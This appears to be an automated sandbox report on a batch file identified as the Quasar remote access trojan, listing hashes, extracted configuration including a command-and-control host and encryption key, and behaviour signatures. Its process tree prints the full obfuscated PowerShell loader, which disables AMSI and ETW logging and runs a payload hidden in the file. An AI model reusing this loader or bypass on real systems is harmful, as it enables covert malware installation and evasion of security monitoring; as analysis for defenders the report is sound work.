Overview

overview

10

Static

static

1

Client-built.exe.bat

windows10-ltsc 2021-x64

10

Client-built.exe.bat

windows11-21h2-x64

10

Analysis

  • max time kernel
    13s
  • max time network
    22s
  • platform
    windows11-21h2_x64
  • resource
    win11-20241007-en
  • resource tags

    arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    25-11-2024 23:43

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Client-built.exe.bat

  • Size

    4.2MB

  • MD5

    e8f9b123f6368338546d660e983af6b0

  • SHA1

    d622ddcfbba5060244816540768925563a7c66c3

  • SHA256

    4a664bab85afe1b3d5013278ba99280506c1eb42bac4e7b23bcc932eda627c8b

  • SHA512

    6ad576a2dd1e73b2eb18c240bd4ac824850e431d800fc2d8c520f6a2b1ea8d50d01c008bcab5cb1cc5189f120fd331870fa25925a2994a8c1e84e265492e9f5c

  • SSDEEP

    49152:eDzoesdQ9TpsKmiB/J73/gnGKmTi5wU50WU:Q

Score
10/10
quasarfrexecutionspywaretrojan

Malware Config

Extracted

Family

quasar

Version

1.4.1

Botnet

fr

C2

kdotisbetterfr.airdns.org:61875

Mutex

de3f242e-9b27-4bcc-b108-2b89973fa679

Attributes
  • encryption_key

    A9E1D2CBD6699561DDC6C38CE5B7E79D283DC83E

  • install_name

    Client.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    Quasar Client Startup

  • subdirectory

    SubDir

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

    trojanspywarequasar
  • Quasar family
    quasar
  • Quasar payload 1 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

    execution
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Client-built.exe.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2000
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -exec bypass -C "$kdot_file='C:\Users\Admin\AppData\Local\Temp\Client-built.exe.bat';if (.([char](((-18989 -Band 4925) + (-18989 -Bor 4925) + 5167 + 8981))+[char]((15592 - 5449 - 5372 - 4670))+[char]((7757 - 4149 - 3692 + 199))+[char]((6189 - 5510 - 4827 + 4264))+[char](((-712 -Band 8324) + (-712 -Bor 8324) - 9313 + 1746))+[char](((-4636 -Band 8829) + (-4636 -Bor 8829) - 9840 + 5727))+[char]((21086 - 6295 - 9972 - 4722))+[char]((13029 - 9372 + 5383 - 8924))+[char](((2214 -Band 3002) + (2214 -Bor 3002) + 14 - 5126))) ([SySTEM.Text.eNcODiNg]::UTf8.geTStRiNg([syStem.cOnVERt]::FROmBaSe64STRINg('JEVOVjp1c2VycHJvZmlsZVxE')) + [SySteM.teXt.encOding]::UTF8.geTStriNg((0x6f, 0x77, 0x6e, 0x6c, 0x6f, 0x61, 0x64, 0x73, 0x5c, 0x52, 0x65, 0x73, 0x75, 0x6d, 0x65)) + [syStem.tEXT.encODing]::uTF8.gEtstRing((0x47, 0x72, 0x61, 0x6e, 0x74, 0x2e, 0x73, 0x79, 0x73)))) { exit };${kdOtLCJrxpwvng}=([systEM.tExt.eNcoDinG]::utf8.GeTSTrINg((83, 121, 115, 116, 101, 109, 46, 77, 97, 110, 97, 103, 101, 109, 101, 110, 116, 46)) + [SySTEm.TeXt.ENCOding]::UTF8.geTsTRIng([SysTem.conVeRt]::fROmbaSe64StRINg('QXV0b21hdGlvbi5BbXNpVXRpbHM=')));${k`DotvllZJgLtgx}=([SystEM.tEXt.ENcODInG]::uTF8.GETstrInG([sYStEm.COnVeRT]::FrOmbaSe64strIng('YW1zaUluaXRGYWlsZWQ=')));${KdOteJyma`PyhoD}=[REF].AssEmblY;${kdOtap`Yr`KnuXkZ}=${kdOt`EJYMapYHOD}.geTtype(${k`Dotl`CjrxpwvnG});$kdoTgnaGLeanqB=${kdoTaPyrkn`UXKz}.geTfIELD(${KdotvL`Lz`JgLtgx},([SysTeM.tExt.EnCODING]::uTF8.geTStrinG((0x4e, 0x6f, 0x6e, 0x50, 0x75, 0x62, 0x6c, 0x69, 0x63, 0x2c, 0x53, 0x74, 0x61, 0x74, 0x69, 0x63))));$KdOtgNaGLeanQb.sEtvaLUE($nULl,([BOol][chaR]));([REflEcTion.ASsemBlY]::LOaDwIthpARtIALnaME(((([sySTEM.text.eNcOdiNg]::utF8.GETStRing((0x53, 0x79, 0x73, 0x74, 0x65, 0x6d, 0x2e, 0x43, 0x6f, 0x72, 0x65)))))).GeTTYPe(((([SyStEm.TeXT.ENcOdING]::utF8.geTSTRInG((83, 121, 115, 116, 101, 109, 46, 68, 105, 97, 103, 110, 111, 115, 116, 105)) + [syStem.TExT.EncoDing]::utF8.gEtSTRing((99, 115, 46, 69, 118, 101, 110, 116, 105, 110, 103, 46, 69, 118, 101, 110, 116, 80, 114, 111)) + [SysTEm.tEXT.ENCOdinG]::UTF8.GETstring((0x76, 0x69, 0x64, 0x65, 0x72)))))).GETfIeLD(((([sYsTeM.TeXt.ENcOdiNg]::Utf8.GeTstRiNG((109, 95)) + [sySteM.texT.enCODInG]::UTF8.GEtSTring((0x65, 0x6e, 0x61, 0x62)) + [sYsTem.TeXt.eNCOdIng]::UTf8.geTSTRING((108, 101, 100))))),((([system.TeXt.EncOdInG]::utF8.gEtSTRinG((78, 111, 110, 80, 117, 98, 108, 105, 99, 44, 73, 110, 115, 116, 97, 110, 99, 101)))))).SetVaLuE([Ref].ASsEmbly.getType(((([systEm.Text.ENcODIng]::uTF8.GeTStriNG((83, 121, 115, 116, 101, 109, 46, 77, 97, 110, 97, 103, 101, 109, 101, 110, 116, 46, 65, 117, 116, 111, 109, 97, 116, 105, 111, 110, 46, 84, 114, 97, 99, 105)) + [SYSteM.TEXT.ENCodIng]::Utf8.GEtSTrinG((0x6e, 0x67, 0x2e, 0x50, 0x53, 0x45, 0x74, 0x77, 0x4c, 0x6f, 0x67, 0x50, 0x72, 0x6f, 0x76, 0x69, 0x64, 0x65, 0x72)))))).GetfielD(((([SySTEM.teXT.eNcODiNG]::utf8.gETStRing((0x65, 0x74, 0x77, 0x50, 0x72, 0x6f, 0x76, 0x69, 0x64, 0x65, 0x72))))),((([SysTeM.TEXt.ENCoDInG]::utf8.gEtsTRinG((0x4e, 0x6f, 0x6e, 0x50, 0x75, 0x62, 0x6c, 0x69, 0x63, 0x2c, 0x53, 0x74, 0x61, 0x74, 0x69, 0x63)))))).GetVAluE($nULl),0));.([char]((-257 - 1031 + 9766 - 8373))+[char]((1823 - 9768 + 8223 - 177))+[char](((-19562 -Band 889) + (-19562 -Bor 889) + 9885 + 8908))) ([tEXT.encodIng]::UTF8.gEtSTrING([CoNvErt]::FroMBAse64StriNg((.([char]((11498 - 2401 - 178 - 8848))+[char]((-11105 - 5194 + 7505 + 8895))+[char]((222 - 4618 + 153 + 4359))+[char]((-2637 - 1093 + 9286 - 5511))+[char](((-4650 -Band 9781) + (-4650 -Bor 9781) - 1475 - 3589))+[char]((3131 - 3111 + 154 - 63))+[char]((18786 - 6317 - 8092 - 4267))+[char](((-2844 -Band 5727) + (-2844 -Bor 5727) - 703 - 2064))+[char]((7821 - 9012 - 6084 + 7376))+[char]((4558 - 872 + 4205 - 7781))+[char](((15508 -Band 482) + (15508 -Bor 482) - 7709 - 8165))) $KDot_file -raw | .([char]((11950 - 980 - 4943 - 5944))+[char](((-8135 -Band 6460) + (-8135 -Bor 6460) - 479 + 2255))+[char](((-13228 -Band 3952) + (-13228 -Bor 3952) + 547 + 8837))+[char](((-19627 -Band 1554) + (-19627 -Bor 1554) + 9787 + 8387))+[char](((-21855 -Band 6576) + (-21855 -Bor 6576) + 9605 + 5773))+[char](((10719 -Band 1622) + (10719 -Bor 1622) - 4422 - 7803))+[char](((15556 -Band 721) + (15556 -Bor 721) - 9597 - 6635))+[char](((4849 -Band 877) + (4849 -Bor 877) - 2305 - 3338))+[char](((-13113 -Band 8015) + (-13113 -Bor 8015) + 3741 + 1473))+[char]((-17 - 8310 + 8801 - 360))+[char](((-8482 -Band 1532) + (-8482 -Bor 1532) + 8379 - 1324))+[char]((-1608 - 2948 - 4299 + 8965))+[char](((-7699 -Band 8648) + (-7699 -Bor 8648) + 538 - 1384))) (([SySTem.teXt.eNcOdiNg]::UTf8.GEtsTrinG(58)) + ([SyStem.TExT.ENcodinG]::utf8.gETstRINg([sYstem.cOnVert]::FRoMbaSe64strIng('OktET1Q6OiguKik='))))).MAtcHeS.GrouPS[1].vaLuE)))"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:848
      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\q3us4qif\q3us4qif.cmdline"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2844
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA7D9.tmp" "c:\Users\Admin\AppData\Local\Temp\q3us4qif\CSCE9C3783432E643E58CDDF29BD1A8AEA2.TMP"
          4⤵
            PID:3376

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\RESA7D9.tmp
      Filesize

      1KB

      MD5

      469e686e9df2e52f7e82ab53ab97fde7

      SHA1

      0ee7ecd82e1ffbd9a168816e99e944979dd8c945

      SHA256

      f1dd5c5fccfdde2df6a3115e515de95e442f5cb62b42f43fb9e64c17a65e1bbf

      SHA512

      df3bbb500722d506989302c091a8f5ea3c3e3dc5be4c53668a097ac6da92c4549a25b3199bfe529d828d649d5ba5bf3c7e705f3daa00beaee43093bfb5107c8f

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qqixz41f.ezx.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\q3us4qif\q3us4qif.dll
      Filesize

      8KB

      MD5

      d455ea2a78e7c692c0576dc34e16d89a

      SHA1

      9cd913ecc8f7722806f0a4b976c6ad643540c67b

      SHA256

      696c26115d19f1626d6aa464e1a5291074350eb8794ea5876125aa91e86e26fe

      SHA512

      e70066ca369f69522bf3751ec20a2ff3c2a1034610a633fb21c0189ec2c393d4a57c515ef5aa65e848d29066f4e44ee14a215b17c644994cd6c46ca8fd51137a

      Download Submit

    • \??\c:\Users\Admin\AppData\Local\Temp\q3us4qif\CSCE9C3783432E643E58CDDF29BD1A8AEA2.TMP
      Filesize

      652B

      MD5

      01f9d97b36be611ffb3696a03f02d757

      SHA1

      69c658f06bfb9c56199bb5cfad473fb4c4023a35

      SHA256

      d33155bbbcb522bb48e26b46ccbeea4c364dfdb23102241310819ddeb5bfbf91

      SHA512

      33023556438cdec776c3678c2497d239fe1545530adfbe0a70bee40ff066da99c2ca08fb094b6dd2ab3296b4c2abf8d68942b74644f243e0e01327d532a7f362

      Download Submit

    • \??\c:\Users\Admin\AppData\Local\Temp\q3us4qif\q3us4qif.0.cs
      Filesize

      11KB

      MD5

      2baccf8bd40aaee5659a70165d301596

      SHA1

      52f6af554b3df57db81005dd6360f4bc39b93531

      SHA256

      6c6ca5f865d9346cd32d84e0122d1bf08051d8b53c47208cef44bd2bb6133884

      SHA512

      dfbe57879f918c029dc628cc27961d63eca88104e8e7fb3aba8c2d1696419d5010c2dfc7e690669835fa50a0344f1ec5f60f714db95112b18c8524e87d1bb51a

      Download Submit

    • \??\c:\Users\Admin\AppData\Local\Temp\q3us4qif\q3us4qif.cmdline
      Filesize

      369B

      MD5

      70a5ad09404150b264f9c75d93bc0397

      SHA1

      41c749907a384353f81d7ddfdf07469ece2040d2

      SHA256

      0b0a627a2d59f32e71e2cbe7a88238db89a5f2dc244fed1ef59adfb06e439eb5

      SHA512

      6dd0801dd732db67c180a22bf19831dff3251484a4fa993db7c77a15e842d06218a8fd3c5989d5c535ef30238c84b3f7ebbabd91f3fdd01f8e75c7a96ab5a3c5

      Download Submit

    • memory/848-12-0x00007FF93C010000-0x00007FF93CAD2000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/848-28-0x00007FF93C010000-0x00007FF93CAD2000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/848-11-0x00007FF93C010000-0x00007FF93CAD2000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/848-10-0x00007FF93C010000-0x00007FF93CAD2000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/848-6-0x000001AB6E9F0000-0x000001AB6EA12000-memory.dmp

      Filesize

      136KB

      Download

    • memory/848-25-0x000001AB6EC00000-0x000001AB6EC08000-memory.dmp

      Filesize

      32KB

      Download

    • memory/848-27-0x00007FF93C013000-0x00007FF93C015000-memory.dmp

      Filesize

      8KB

      Download

    • memory/848-0-0x00007FF93C013000-0x00007FF93C015000-memory.dmp

      Filesize

      8KB

      Download

    • memory/848-29-0x00007FF93C010000-0x00007FF93CAD2000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/848-30-0x00007FF93C010000-0x00007FF93CAD2000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/848-31-0x000001AB6EE70000-0x000001AB6F194000-memory.dmp

      Filesize

      3.1MB

      Download

    • memory/848-32-0x000001AB6F770000-0x000001AB6F7C0000-memory.dmp

      Filesize

      320KB

      Download

    • memory/848-33-0x000001AB6F880000-0x000001AB6F932000-memory.dmp

      Filesize

      712KB

      Download

    • memory/848-34-0x000001AB6FB10000-0x000001AB6FCD2000-memory.dmp

      Filesize

      1.8MB

      Download